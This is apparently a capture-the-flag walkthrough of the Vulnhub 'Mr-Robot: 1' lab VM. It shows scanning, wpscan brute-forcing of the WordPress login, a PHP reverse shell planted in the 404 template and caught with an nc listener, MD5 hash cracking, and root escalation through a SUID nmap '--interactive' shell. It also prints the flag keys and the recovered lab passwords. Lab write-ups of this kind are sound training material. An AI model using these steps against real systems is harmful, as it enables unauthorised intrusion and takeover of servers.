Vulnhub – Mr-Robot: 1

Since I enjoy the show Mr.Robot, I had to try this VM out. Point of this game is to find 3 keys hidden in the VM. Link to download the VM can be located here . Lets get started!

Description from author:

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

The Attack

Kali Linux machine

 192.168.182.147 

Using the tool netdiscover, I found the victim VM to be 192.168.182.158

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Using nmap to do a version scan of the victim. Lets see what we find.

root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~# 

Looks like the victim is running Apache on ports 80/tcp and 443/tcp. Safe to assume that we will be pwning a web server. Lets do some further scanning on the victim using nikto to find any vulnerabilities on the system.

root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

With nikto I was able to see that it was a WordPress site. I also see the /wp-login.php/, readme.html ,license.txt , and robots.txt files which look pretty interesting. Before we check these files, lets browse the web server and see what it gives us.

Well the server gives us a fancy intro and then gives us a message and a list of commands that we can run. None of them were that interesting but only the join command, where it asks for your email to “join” them. I didn’t put any email. Instead I looked into the files stated earlier. Lets check them out!

BINGO! Found the first key which turned out to be 073403c8a58a1f80d943455fb30724b9 and also a found file called fsocity.dic . Turns out to be a dictionary file. Maybe we will use this for later? For now lets save the file and continue on with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

Well according to the readme.html file the victim is running WordPress Version 4.3.9 . I checked the liscense.txt file but found nothing of interest in there. Now lets check out /wp-login.php/ .

When viewing the page, I decided to see if there were any default username and passwords by inputting admin:admin ,but said the username was invalid. However, because of watching this show and knowing that the main character is elliot, I decided to input elliot as a username and password.

Looks like we are on to something! I got the password wrong however WordPress confirms that elliot is a username on the site. I will be doing a dictionary attack on the WordPress using the fsocity.dic which I acquired earlier. Before I do the dictionary attack, I will try make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot’s password.

root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l
11451
root@kali:~/Documents# 
 cat fsocity.dic| sort -u | uniq > Newfsocity.dic 

I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter dictionary file to Newfsociety.dic. Now lets use wpscan to get the elliot’s password.

root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads# 

Nice! Elliot’s password is ER28-0652. Now lets log in.


It worked! There are many things I can do from here like check which plugins installed are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a php file to get a reverse shell.

Note: I got the php-reverse-shell from pentestmonkey. The link to file can be located here. Also, before uploading the file, make sure to edit the ip variable and port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234 .

With that done lets upload the file!

Well looks like WordPress is set up to block my php file from uploading. They probably have the wp-config.php set up this way. Its all good, I still have another trick up my sleeve. Lets edit one of the pages and put our code from the reverse-shell-php file instead. Go to Appearance -> Editor -> 404.Template. Add the code to the bottom and click update file. Should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

We have the listener set up and ready to go. Now I am going to use curl in order to get reverse shell to run and return us a shell to our listener.

Used to get reverse-shell going

root@kali:~# curl http://192.168.182.158/404.php

On the listener side

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
192.168.182.158: inverse host lookup failed: Unknown host
connect to [192.168.182.147] from (UNKNOWN) [192.168.182.158] 41061
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 05:14:30 up  4:25,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
$ 

Got a shell back with the user daemon. Lets see if we can spawn a tty shell. Netsec has a good blog on helping with that. I recommend you all check him out. His blog on spawing a tty shell can be located here .
Used code below to spawn a tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that I snooped around and found in the /home/robot/ directory key 2 but got permission denied. I would have to be robot user (or root) to view it. However I did find a password.raw-md5 file. Maybe this might be a password to log in as robot? Lets open the file up.

$ ls
ls
key-2-of-3.txt	password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ 

BINGO! I have the password hash for robot. I used crackstation.net to crack the password which revealed to be abcdefghijklmnopqrstuvwxyz . Alright lets log in as robot.

$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ 

Now that we are logged in as robot lets get our 2nd key.

$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt	password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$ 

2nd Key:

822c73956184f694993bede3eb39f959

Got our 2nd key. Now lets try to get root now! Lets try to find any files that have the SUID bit set.

$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 

Well looks like we can run nmap as root since it has the SUID binary set. Lets check the version of nmap to see if it still supports interactive mode.

$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$ 

Nmap is running version 3.81 which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. Found a useful post that is helpful called Why You Can’t Un-Root a Compromised Machine .
Check it out. It’s very helpful. Now lets get our root shell and our last key.

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# 

We got root shell! Lets go to the root directory and get our last key.

# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Key 3:

04787ddef27c3dee1ee161b21670b4e4

Conclusion

Well there you go, I got all 3 keys and root shell to our victim vm. Had fun with this one since it dealt with Mr. Robot, which is a really cool show. Recommend to anyone that is interested in watching it. That’s it for now. Till next time!

Leave a Reply

Your email address will not be published. Required fields are marked *